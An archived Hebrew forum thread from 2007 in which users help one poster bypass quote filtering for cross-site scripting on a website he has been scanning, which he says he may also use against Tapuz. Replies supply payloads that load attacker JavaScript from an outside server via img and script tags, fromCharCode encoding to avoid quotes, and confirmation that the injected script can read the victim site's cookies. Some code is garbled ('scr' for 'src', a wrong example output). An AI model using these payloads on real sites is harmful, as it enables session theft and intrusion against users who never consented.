Logo

רד-בורד: ארכיון

ראשי > אבטחת מידע > משהו נגד סינון מרכאות? (לXSS)

25/06/2007 17:22:35 Ratinho
סרקתי קצת XSS באיזה אתר אחד..
קיצר בכמה מקומות הצלחתי הגיד להקפיץ הודעה אלרט עם מספרים, אבל ברגע שאני מכניס מרכאות (" "), אז הוא מסנן אותם(\") מישהו מכיר דרך להתגבר על זה?
אולי באיזה קידוד או משהו?
25/06/2007 17:29:02 devil kide
אם אתה מתכוון להריץ על הIE אתה יכול להכניס את התווית
img scr
בצורה כזו:
קוד:<img scr=http://server.com/jscript.js>
ש jscript.js יכיל סקיפט שאתה רוצה להריץ.
תנסה להשתמש בפונקציה string.fromcharcode
ז"א
קוד:x=string.fromcharcode(56,57,58,59);
alert (x);

זה יקפיץ
ABCD

אתה יכול גם להשתמש ב ASCII של הקוד.
נניח אם 106 זה הקוד האסקיי של "J" ו97 של "a" אז בצורה כזאת:
ja...עד שתגיע לקוד...
יש גם את אותה האופציה רק בבינארי או בסיס 16, אבל אני לא זוכר בע"פ.


[ההודעה נערכה על-ידי devil kide ב-25/06/2007 17:33:54]
25/06/2007 17:43:24 Ratinho
אה תודה זה מעולה
יש מצב שאפשר לנצל עם זה גם באג בתפוז (:
25/06/2007 18:44:21 SkOd
קוד:<script>xss=/test/;alert(xss.source);</script>
25/06/2007 19:02:25 Ratinho
ציטוט:קוד:<script>xss=/test/;alert(xss.source);</script>
זה קצת בעיה, מכיוון שאני מנסה להכניס כתובת, וברגע שאני עושה
http://
אז זה סוגר את זה..
25/06/2007 20:20:39 sysctl
אני עושה ככה:
קוד:
<script src=server.com/script.js></script>

וזה מפעיל
25/06/2007 20:50:52 Ratinho
ומה עם קוקיז?
או שזה בעצם מתייחס לקוקיז מהדף ההוא?[ההודעה נערכה על-ידי Ratinho ב-25/06/2007 20:51:16]
25/06/2007 21:12:25 sysctl
אפשר הכל. הסקריפט יורץ על האתר שאתה מתקיף.
25/06/2007 21:30:47 Ratinho
טוב תודה רבה עזר לי מאד
27/06/2007 16:57:26 HLL
ציטוט:אם אתה מתכוון להריץ על הIE אתה יכול להכניס את התווית
img scr
בצורה כזו:
קוד:<img scr=http://server.com/jscript.js>
ש jscript.js יכיל סקיפט שאתה רוצה להריץ.
[ההודעה נערכה על-ידי devil kide ב-25/06/2007 17:33:54]
חחחחחחחח אתה רציני!? זה באמת עובד?!
27/06/2007 17:58:04 Ratinho
אממ HLL, נראה לי שלא, בדקתי הרגע וזה לא עבד, גם ב scr וגם ב src
27/06/2007 18:12:17 Nuuuuuu
זה כן עובד.. רק ב src
ובלי מרכאות או עם
28/06/2007 02:03:44 devil kide
לי זה כן עבד.
IE6 ,שבא בגרסה של הSP1,אני לא מוצא את הגרסה המלאה של הדפדפן, תסתפקו בזה.
עמודים: 1